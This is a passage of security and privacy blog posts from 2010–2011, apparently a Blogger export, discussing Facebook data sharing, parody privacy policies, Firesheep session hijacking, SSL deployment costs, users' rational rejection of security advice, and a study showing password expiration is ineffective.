And maybe those third party apps didn't realize they could do it either, and they're salivating over the extended marketing possibilities. Technically possible doesn't imply endorsed by Facebook the way putting the ability into the API does, so while getting this information might have been in the realm of sketchy scams before, now it's going to be considered a legitimate asset by more companies. After all, you consented when you installed the app. And remember, corporate assets do tend to be about making money, so don't assume they won't sell those lists. <br />
<br />
So, while it was technically feasible before, maybe now is a good time to reconsider what data you keep within Facebook. And it's always a good time to re-evaluate which applications you have installed or will install. As always, I recommend that you don't leave anything on facebook you wouldn't want shared with the world, so now's a great time to delete your phone number and address from your facebook profile. And if you don't? Well, don't be too surprised when you start getting texts saying that someone needs help with their FarmVille crops.Terri Odahttp://www.blogger.com/profile/10462169521890966235noreply@blogger.com1tag:blogger.com,1999:blog-8281035461329714656.post-16965212422817304902011-01-03T16:05:00.001-05:002011-01-03T16:06:24.170-05:00A bit late: Santa's privacy policyA bit late, but sent to me by a few folk as a fun follow up to <a href="http://webinsecurity.blogspot.com/2010/12/brutally-honest-privacy-policy.html">A brutally honest privacy policy</a>, here's a gem of a privacy policy from... Santa Claus.<br />
<br />
<blockquote>Santa Claus requires your information in order to compile his annual list of Who is Naughty and Who is Nice, and to ensure accuracy when he checks it twice. Your information is also used in connection with delivering the kinds of goods and services you've come to expect from Santa, including but not limited to toys, games, good cheer, merriment, Christmas spirit, seasonal joy, and holly jollyness.</blockquote><br />
Read the rest here: "<a href="http://www.mcsweeneys.net/2010/12/23hughes.html">Santa's Privacy Policy</a>" and leave those christmas decorations up just one more day before getting back to regular old January.Terri Odahttp://www.blogger.com/profile/10462169521890966235noreply@blogger.com0tag:blogger.com,1999:blog-8281035461329714656.post-21680524422404186982010-12-14T00:18:00.001-05:002010-12-14T00:21:26.245-05:00A brutally honest privacy policyDan Tynan has decided to cut through the legalease and confusion inherent in many privacy policies and <a href="http://www.itworld.com/print/129778">produced a "real" privacy policy which is open-sourced for anyone to adopt</a>. What results is hilarious and sad at once because it reflects a lot of how "private" data may be used. Here's an excerpt:<br />
<br />
<blockquote>"At COMPANY _______ we value your privacy a great deal. Almost as much as we value the ability to take the data you give us and slice, dice, julienne, mash, puree and serve it to our business partners, which may include third-party advertising networks, data brokers, networks of affiliate sites, parent companies, subsidiaries, and other entities, none of which we’ll bother to list here because they can change from week to week and, besides, we know you’re not really paying attention.<br />
<br />
We’ll also share all of this information with the government. We’re just suckers for guys with crew cuts carrying subpoenas.<br />
<br />
Remember, when you visit our Web site, our Web site is also visiting you. And we’ve brought a dozen or more friends with us, depending on how many ad networks and third-party data services we use. We’re not going to tell which ones, though you could probably figure this out by carefully watching the different URLs that flash across the bottom of your browser as each page loads or when you mouse over various bits. It’s not like you’ve got better things to do.<br />
<br />
...<br />
<br />
So just to recap: Your information is extremely valuable to us. Our business model would totally collapse without it. No IPO, no stock options; all those 80-hour weeks and bupkis to show for it. So we’ll do our very best to use it in as many potentially profitable ways as we can conjure, over and over, while attempting to convince you there’s nothing to worry about.</blockquote><br />
<a href="http://www.itworld.com/print/129778">Read the rest along with commentary on Dan's blog</a>. He notes that it’s 5,085 words shorter than Facebook’s policy, just for comparison.Terri Odahttp://www.blogger.com/profile/10462169521890966235noreply@blogger.com0tag:blogger.com,1999:blog-8281035461329714656.post-25638791887079401872010-11-03T10:00:00.010-04:002010-11-03T10:00:10.546-04:00Security Costs vs Benefits: Should companies deploy SSL to deal with Firesheep?<div style="float: right; margin-left: 10px; margin-bottom: 10px;"><a href="http://www.flickr.com/photos/jeffanddayna/4146023669/" title="SSL"><img src="http://farm3.static.flickr.com/2705/4146023669_29dae2f065_m.jpg?zz=1" alt="SSL" style="border: solid 2px #000000;" /></a><br /> <span style="font-size: 0.9em; margin-top: 0px;"><br />
<a href="http://www.flickr.com/photos/jeffanddayna/4146023669/">SSL</a> <br />by <a href="http://www.flickr.com/photos/jeffanddayna/">jeff_golden</a>.</span></div>Yesterday, I talked about <a href="http://webinsecurity.blogspot.com/2010/11/apathy-or-sensible-risk-evaluation-why.html">why end-users don't care about security</a> and how that actually makes a certain amount of sense for them since the cost of behaving more securely can overwhelm the cost of an actual breach.<br />
<br />
However, what I didn't talk about is whether this is true for companies. A single security breach in a single user account maybe doesn't cost a company much, but if breaches get common enough that they start losing users, it could be a problem with a much higher cost.<br />
<br />
While users trying to protect themselves from curious folk with firesheep are counseled to use a VPN, website owners can choose to do encryption right from their end using SSL. But it was thought that SSL was computationally costly and even <em>environmentally</em> costly due to the supposed need for extra electricity and machines.<br />
<br />
But who's been looking at what those costs actually are? A blog post entitled <a href="http://www.imperialviolet.org/2010/06/25/overclocking-ssl.html">Overclocking SSL</a> looked at the severity of these costs as they deployed SSL, and made a pretty clear statement:<br />
<br />
<blockquote>If there's one point that we want to communicate to the world, it's that SSL/TLS is not computationally expensive any more. Ten years ago it might have been true, but it's just not the case any more. You too can afford to enable HTTPS for your users.<br />
</blockquote><br />
So there you have it: the people who should be protecting users from firesheep attacks are probably the companies who run the websites, since SSL isn't likely to be as costly to them as numerous complaints and support requests would be from their users. The cost equation might not be the same for all organizations, since the cost of certificates and labour can be non-trivial if you don't already have expertise on hand. But sure enough, <a href="http://gmailblog.blogspot.com/2010/01/default-https-access-for-gmail.html">Google has decided to provide https access by default to all gmail users</a>, so they clearly believe it's worth it. <br />
<br />
This leads to an interesting question: Does the burden of security always fall heavily on corporations and large organizations rather than on end-users? Many would argue that this is naive and that users must bear some responsibility, others would argue that only corporations have the resources necessary to make an impact on security. This is a much larger discussion that I expect we'll see occurring over and over again for a very long time.Terri Odahttp://www.blogger.com/profile/10462169521890966235noreply@blogger.com3tag:blogger.com,1999:blog-8281035461329714656.post-25821979564847018302010-11-02T12:42:00.039-04:002010-11-02T15:49:10.330-04:00Apathy or sensible risk evaluation: why don't people care about security?<div style="float: right; margin-left: 10px; margin-bottom: 10px;"><a href="http://www.flickr.com/photos/pierofix/3094329703/" title="Starbucks' Christmas Bokeh"><img src="http://farm4.static.flickr.com/3024/3094329703_f20d486ba0_m.jpg" alt="Starbucks' Christmas Bokeh" style="border: solid 2px #000000;" /></a><br />
<span style="font-size: 0.9em; margin-top: 0px;"><br />
<a href="http://www.flickr.com/photos/pierofix/3094329703/">Starbucks' Christmas Bokeh</a> <br />
by <a href="http://www.flickr.com/photos/pierofix/">pierofix</a>.</span></div>Engineer Gary LosHuertos decided to try <a href="http://technologysufficientlyadvanced.blogspot.com/2010/10/herding-firesheep-in-new-york-city.html">Herding Firesheep in New York City</a>: He sat down in a Starbucks, opened up his laptop and started gathering profiles, then sent messages to people whose facebook accounts he could access warning them of the security flaws. Some people closed up and left, but some just ignored his message and went on with their day. Confused, he sent another message, but they just didn't seem to care and continued using their accounts.<br />
<br />
<blockquote>This is the most shocking thing about Internet security: not that we are all on a worldwide system held together with duct tape that has appalling security vulnerabilities; not that a freely available tool could collect authentication cookies; and certainly not that there are people unaware of either. What's absolutely incomprehensible is that after someone has been alerted to the danger (from their own account!) that they would casually ignore the warning, and continue about their day.</blockquote><br />
But <em>is</em> this shocking? To someone who cares about security, maybe. To someone who knows people? Less so. <br />
<br />
Cormac Herley has an absolutely great paper entitled "<a href="http://docs.google.com/viewer?a=v&q=cache:UCrzi5_P5fkJ:research.microsoft.com/en-us/um/people/cormac/papers/2009/SoLongAndNoThanks.pdf&hl=en&gl=ca&pid=bl&srcid=ADGEEShcwF5NUFTHr49SHpuOuwwAXGb6Oy2THAKgdwquvGWCHwyaf-I0ZbXu8bcKsA3LCM5n2SFL6mKJ6X8_Ihq5nYOjxvsGS0bjIqgZycrlRcnaQMbhmSS2f2yHpoSIQlb-dfJlc2Te&sig=AHIEtbQIrbuCbg8Eliatp6RviN8ZThn6Zg">So Long, And No Thanks for the Externalities: The Rational Rejection of Security Advice by Users</a>" <br />
<br />
<blockquote>It is often suggested that users are hopelessly lazy and unmotivated on security questions. They chose weak passwords, ignore security warnings, and are oblivious to certificates errors. We argue that users’ rejection of the security advice they receive is entirely rational from an economic perspective. The advice offers to shield them from the direct costs of attacks, but burdens them with far greater indirect costs in the form of effort.</blockquote><br />
So let's think a little bit about cookies and firesheep. One of the ways to be most safe is to browse using a VPN. For someone who already has one set up, this is pretty much a matter of toggling something on your computer: pretty low difficulty and less trouble than having your accounts hacked. You can see why many geeks think it's ridiculous that people wouldn't just secure their sites: even if you include time setting up the VPN, for many folk that's a task that falls under the heading of "something I meant to do anyhow" and isn't really perceived as costly.<br />
<br />
But if you're not a computer-savvy person who has a server online to host a VPN, setting up a VPN can be stupidly costly. Maybe you'd have to replace your router with one that can handle it. Maybe you'd have to pay for hosting. Maybe you'd have to spend hours figuring out how to generate keys, or pay someone else to do that. Maybe just figuring out what you need to do at all is going to take hours. Quickly, the hours required seem worth more than the cost of having some stranger send you messages from your own facebook account, or maybe set your status message to something embarrassing.<br />
<br />
Perhaps what we need to raise the costs of a security mishap is a little evil. It's actually easy to craft a firesheep-based attack that <em>would</em> raise the cost high enough to make VPN hunting (or just not using the Starbucks wireless) seem worthwhile to most people: Log into someone's account, delete all their status messages, notes and photos, defriend all their friends. Since there's no easy way to back up your facebook profile, the results would be devastating and partially unrecoverable: worth more than the pain of setting up a VPN or going without FB while in a coffee shop. It might be easier to litigate for theft/unauthorized access than it is to restore that profile, so I don't recommend any security vigilantes start doing this!<br />
<br />
So I guess the take-home message here is that while it's worth trying to educate users so they can make smarter decisions, they're not necessarily being delusional or foolish when they just say "meh" and go on with their lives. If we want to make a really huge impact, we need security solutions that are so low-pain that there's no longer any rational reason to reject them.Terri Odahttp://www.blogger.com/profile/10462169521890966235noreply@blogger.com0tag:blogger.com,1999:blog-8281035461329714656.post-3137661823224644462010-10-29T00:56:00.000-04:002010-10-29T00:56:07.829-04:00Apparently Facebook hates privacy so much that they pay lobbyists to stop privacy laws<div style="float: right; margin-left: 10px; margin-bottom: 10px;"><a href="http://www.flickr.com/photos/sunside/1433052868/" title="Privacy is not a crime"><img src="http://farm2.static.flickr.com/1103/1433052868_20070e97e2_m.jpg?zz=1" alt="Privacy is not a crime" style="border: solid 2px #000000;" /></a><br /> <span style="font-size: 0.9em; margin-top: 0px;"><br />
<a href="http://www.flickr.com/photos/sunside/1433052868/">Privacy is not a crime</a> <br />by <a href="http://www.flickr.com/photos/sunside/">sunside</a>.</span></div>This maybe shouldn't surprise anyone, but Mashable is reporting that <a href="http://mashable.com/2010/10/27/facebook-lobbying/?utm_source=feedburner&utm_medium=feed&utm_campaign=Feed:+Mashable+(Mashable)">Facebook Lobbied to Kill Social Networking Privacy Act</a> in the USA. <br />
<br />
It's one thing to believe that privacy isn't important, or to make mistakes that expose users, but paying people to lobby against privacy legislation that might protect your users seems like a big step further. It makes me concerned as a user of the service.<br />
<br />
Incidentally, <a href="http://www.cbc.ca/technology/story/2009/07/16/facebook-privacy-commissioner.html">Facebook has already broken Canadian privacy law</a> (<a href="http://www.webpronews.com/topnews/2010/10/19/commissioner-google-contravened-canadian-privacy-law">they're not the only ones</a>), and likely the laws of several other countries, so I guess it makes sense that they wouldn't want to run afoul of further laws... but I really wish they'd do this by handling privacy issues better rather than paying people to make sure the laws don't come into effect. Maybe the law was simply ill-conceived (I haven't read it) but this <em>really</em> doesn't sound like the actions of a socially-responsible company. Very disappointing.Terri Odahttp://www.blogger.com/profile/10462169521890966235noreply@blogger.com0tag:blogger.com,1999:blog-8281035461329714656.post-18542964738469826322010-10-28T09:00:00.002-04:002010-10-28T09:00:15.317-04:00Why 12 year olds may be our best bug huntersYou may have heard the news: <a href="http://www.mercurynews.com/san-jose-neighborhoods/ci_16401891">Mozilla pays 12-year-old San Jose boy for hunting bugs in system</a>:<br />
<br />
<div style="float: left; margin-right: 10px; margin-bottom: 10px;"><a href="http://www.flickr.com/photos/kjellander/1604250518/" title="bugged"><img src="http://farm3.static.flickr.com/2336/1604250518_8f0af35eed_m.jpg" alt="bugged" style="border: solid 2px #000000;" /></a><br /> <span style="font-size: 0.9em; margin-top: 0px;"><br />
<a href="http://www.flickr.com/photos/kjellander/1604250518/">bugged</a> <br />by <a href="http://www.flickr.com/photos/kjellander/">Oℓivia</a>.</span></div><blockquote>It's safe to say a typical Willow Glen 12-year-old doesn't earn $3,000 for a couple of weeks' worth of work. Then again, Alex Miller is no typical 12-year-old.<br />
<br />
Alex is a bug hunter, but the bugs he's uncovering are unlikely to end up in any entomological reference book. Instead, the bug Alex found was a valid critical security flaw buried in the Firefox web browser. For his discovery, he was rewarded a bug bounty of $3,000 by Mozilla, the parent company of Firefox.<br />
</blockquote><br />
Much of the coverage I've seen has been along the lines of "wow, if a 12 year old can find a bug, then anyone can do this!" which I think is awesome if it has more people out looking through code in hopes of one of those $3k bounties. But I also find that attitude a little sad because frankly, Alex Miller sounds like a pretty smart guy and implying that what he did is easy because he's young is a bit condescending and likely incorrect.<br />
<br />
But the more I think about it, the more I think that maybe younger bughunters have some natural advantages, and maybe we should go out of our way to recruit them. I taught 17 year olds doing in-lab tutorials for several years running, and work students down to around 12 years old when I've taught mini-courses in the spring, and they're pretty darned sharp.<br />
<br />
Here's some assets younger folk bring to the table when it comes to security flaws:<br />
<br />
<ul><li><b>A different point of view</b> -- Some teachers take it as incredibly frustrating that their students just don't see the world the way they do because it can be hard to teach without common ground, but I've always found it fascinating how my students will write code in ways completely different to what I expect. Frankly, I don't see this kind of diversity when I work with my colleagues, probably because we have similar educational backgrounds. A different way to think can help you find things that others are going to miss, in research or in security bug hunting! <br />
<br />
<li><b>Time</b> -- Alex Miller says he only spend 90 minutes/day for around 10 days to find his bug, but in general tweens and teens can have a lot more free time than their adult counterparts. Sure, there's school and homework and often a slew of extra-curriculars, but there's usually less time spent on childcare, laundry, groceries, cooking, cleaning, yardwork. Younger students may do some of that, but usually not all of the above.<br />
<br />
<li><b>Enthusiasm</b> -- Let's face it; if you stare at code all day at work, you're not always likely to set aside 90 minutes/day to do it at home. Whereas when I was a teenager and was writing essays at school, 90 minutes of debugging sounded like a lot more fun!<br />
<br />
<li><b>Chutzpah</b> -- It's easy for us as adults to think "meh, so many people have looked at this... I'll never find anything" and in general the students I work with have a lot more guts and are just more willing to believe that they personally will change the world if they just try. Certainly, my gaming students often propose genre-busting epic game ideas that I can just imagine getting shot down at a company meeting.<br />
</ul><br />
So maybe we shouldn't be saying "if a 12 year old can do it, anyone can" and instead thinking "how can I channel my inner 12 year old?"Terri Odahttp://www.blogger.com/profile/10462169521890966235noreply@blogger.com0tag:blogger.com,1999:blog-8281035461329714656.post-17561133877081270332010-10-27T15:18:00.001-04:002010-11-02T15:49:29.189-04:00Quick Hit: Firesheep<div style="float: right; margin-left: 10px; margin-bottom: 10px;"><a href="http://www.flickr.com/photos/jule_berlin/839245545/" title="Mountain view with sheep"><img src="http://farm2.static.flickr.com/1423/839245545_d89144d012_m.jpg" alt="Mountain view with sheep" style="border: solid 2px #000000;" /></a><br />
<span style="font-size: 0.9em; margin-top: 0px;"><br />
<a href="http://www.flickr.com/photos/jule_berlin/839245545/">Mountain view with sheep</a> <br />
by <a href="http://www.flickr.com/photos/jule_berlin/">Jule_Berlin</a>.</span></div>By now, probably everyone's already heard of <a href="http://codebutler.com/firesheep?c=1">firesheep</a>, the nice user-friendly way to use cookies to do session hijacking. Want to be logged in as someone else on Facebook? No problem.<br />
<br />
It's nothing spectacular on a technical level, since it's been easy enough to use other people's cookies for quite some time, but it's a pretty impressive social hacking tool. It's making it clear to a lot of people (and media) that this is a real problem, and that it's an exploit anyone can do now.<br />
<br />
I'm actually sort of surprised that I haven't seen this earlier: it used to be a bit of a game in the undergrad lounge to see what one could sniff off the network, with people using some tool whose name I've forgotten to show any images that came up from users surfing on the wireless. Hacking session cookies would have been a fun addition to our childish games -- and I'll bet plenty of college kids are using it for just that. Or for checking out their ex-boyfriends/girlfriends...Terri Odahttp://www.blogger.com/profile/10462169521890966235noreply@blogger.com0tag:blogger.com,1999:blog-8281035461329714656.post-63801871689203535952010-10-11T20:30:00.014-04:002010-10-11T20:54:26.986-04:00Does expiring passwords really help security?<div style="float: left; margin-bottom: 10px; margin-right: 10px;"><a href="http://www.flickr.com/photos/dawn_perry/318923932/" title="photo sharing"><img alt="" src="http://farm1.static.flickr.com/140/318923932_26a701683b_m.jpg" style="border: solid 2px #000000;" /></a><br />
<span style="font-size: 0.9em; margin-top: 0px;"><a href="http://www.flickr.com/photos/dawn_perry/318923932/">Change is Easy</a><br />
Originally uploaded by <a href="http://www.flickr.com/people/dawn_perry/">dawn_perry</a></span></div>I've heard a lot of arguments as to why expiring passwords likely won't help. Here's a few:<br />
<br />
<ul><li>It's easy to install malware on a machine, so the new password will be sniffed just like the old.<br />
</li>
<li>It costs more: frequent password changes result in more forgotten passwords and support desk calls.<br />
</li>
<li>It irritates users, who will then feel less motivated to implement to other security measures.<br />
</li>
<li>Constantly forcing people to think of new, memorable passwords leads to cognitive shortcuts like password-Sep, password-Oct, password-Nov...<br />
</li>
</ul>And yet, many organizations continue to force regular password changes in order to improve security. But what if that's not what's really happening? Three researchers from the University of North Carolina at Chapel Hill have unveiled what they claim to be <a href="http://www.cs.unc.edu/~yinqian/password.html">the first large-scale study on password expiration</a>, and they found it wanting. <br />
<br />
<p>They focus especially on the idea that consecutive passwords will be related, and build a system which could try a variety of transforms such as changing which letter was uppercase, duplicating letters/numbers/symbols, and even <a href="http://en.wikipedia.org/wiki/Leet">"leet" translation</a> (eg: raven becomes r@v3n). The implications of their results are fairly clear and potentially disturbing for those who thought password changing was providing extra security in the case of a breach: <br />
<ul><li>With offline attacks: "<em>On average, roughly 41% of passwords can be broken from an old password in under 3 seconds.</em>"<br />
</li>
<li>With online attacks: "<em>An average of 13% of accounts can be broken (with cer- tainty) in 5 online guesses, and 18% can be broken in 10 guesses.</em>"<br />
</li>
<li>"<em>As we expand our consideration to other types of transform trees, we would not be surprised to see these success rates jump significantly.</em>"<br />
</li>
</ul>In essence, they've shown that changing passwords doesn't provide nearly as much security as system designers had hoped, and they suggest we abandon the practice rather than continue to annoy users with a policy that has been proven ineffective.Terri Odahttp://www.blogger.com/profile/10462169521890966235noreply@blogger.com2